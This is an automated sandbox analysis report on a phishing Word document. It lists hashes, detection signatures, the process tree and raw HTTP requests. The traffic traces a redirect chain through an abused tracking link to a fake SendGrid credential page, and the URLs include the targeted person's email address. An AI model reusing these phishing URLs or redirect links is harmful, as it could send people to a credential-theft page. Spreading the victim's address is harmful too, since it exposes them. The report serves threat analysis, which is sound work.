Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pmendon.ext_Reord_Adjustment.docx

Overview

General Information

Sample name:Pmendon.ext_Reord_Adjustment.docx
Analysis ID:1555285
MD5:5b103f7bf3ff14cef45567a527812be1
SHA1:dcae3fddbcc4248154c2b90f3036e3fe19b3426f
SHA256:488f034dd875312ed8ef92a540c677865269bfacd573d90455fc93dc6251474d
Infos:

Detection

Captcha Phish
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Captcha Phish
AI detected landing page (webpage, office document or email)
Detected use of open redirect vulnerability
Connects to many different domains
Detected suspicious crossdomain redirect
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body with high number of embedded SVGs detected
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 4420 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Pmendon.ext_Reord_Adjustment.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Pmendon.ext+goeasy.com MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 8064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5672 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 8144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.4.pages.csvJoeSecurity_CaptchaPhishYara detected Captcha PhishJoe Security
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.17, DestinationIsIpv6: false, DestinationPort: 49791, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 4420, Protocol: tcp, SourceIp: 1.1.1.1, SourceIsIpv6: false, SourcePort: 53
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-13T17:29:02.593091+010020229301A Network Trojan was detected52.149.20.212443192.168.2.1749712TCP
    2024-11-13T17:29:40.192165+010020229301A Network Trojan was detected52.149.20.212443192.168.2.1749994TCP

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 2.4.pages.csv, type: HTML
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Proxy from: r.neurotags.net/?e=email-activity&h=prod&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=read more.&r=https://sepedatua.com/158983/secure-redirect to https://sepedatua.com/158983/secure-redirect
    Source: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDHTTP Parser: Total embedded SVG size: 443405
    Source: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDHTTP Parser: No favicon
    Source: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=EMAIL_REDACTEDHTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:50009 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.157:443 -> 192.168.2.17:50010 version: TLS 1.2
    Source: winword.exeMemory has grown: Private usage: 22MB later: 85MB
    Source: unknownNetwork traffic detected: DNS query count 44
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: r.neurotags.net to https://sepedatua.com/158983/secure-redirect
    Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
    Source: Joe Sandbox ViewIP Address: 91.228.74.166 91.228.74.166
    Source: Joe Sandbox ViewIP Address: 18.244.18.112 18.244.18.112
    Source: Joe Sandbox ViewIP Address: 91.228.74.200 91.228.74.200
    Source: Joe Sandbox ViewIP Address: 18.66.102.15 18.66.102.15
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.17:49712
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.17:49994
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
    Source: global trafficHTTP traffic detected: GET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1Host: r.neurotags.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bspA476fsYy55S4&MD=WXEEmc47 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /158983/secure-redirect HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /158983/secure-redirect/ HTTP/1.1Host: sepedatua.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /WEB-ID-6672849687924/zerobot?email=Pmendon.ext@goeasy.com HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sepedatua.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com HTTP/1.1Host: mazans.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://sepedatua.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-91a9f83e57a9c0ac9996388c5a881204-lc.min.css HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-e2ee9b88808de4233ff130f26c4dc422-lc.min.css HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/integrations HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mazans.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-65e4613a26158083e3e99e53ac7ff36f-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-47fa670601ba9b5db3afd22023c57f06-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /https://sendgrid.com/error/etc.clientlibs/core/wcm/components/commons/datalayer/v1/clientlibs/core.wcm.components.commons.datalayer.v1.lc-70264651675213ed7f7cc5a02a00f621-lc.min.js HTTP/1.1Host: mazans.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
    Source: global trafficHTTP traffic detected: GET /analytics.js/v1/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/analytics.min.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/projects/1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj/integrations HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rest/v1/delivery?client=twilio&sessionId=ead54cbe71824480b6163d2cf14e5e54&version=2.11.4 HTTP/1.1Host: twilio.tt.omtrdc.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: twilio!mboxSession=ead54cbe71824480b6163d2cf14e5e54; twilio!mboxPC=ead54cbe71824480b6163d2cf14e5e54.37_0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mazans.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
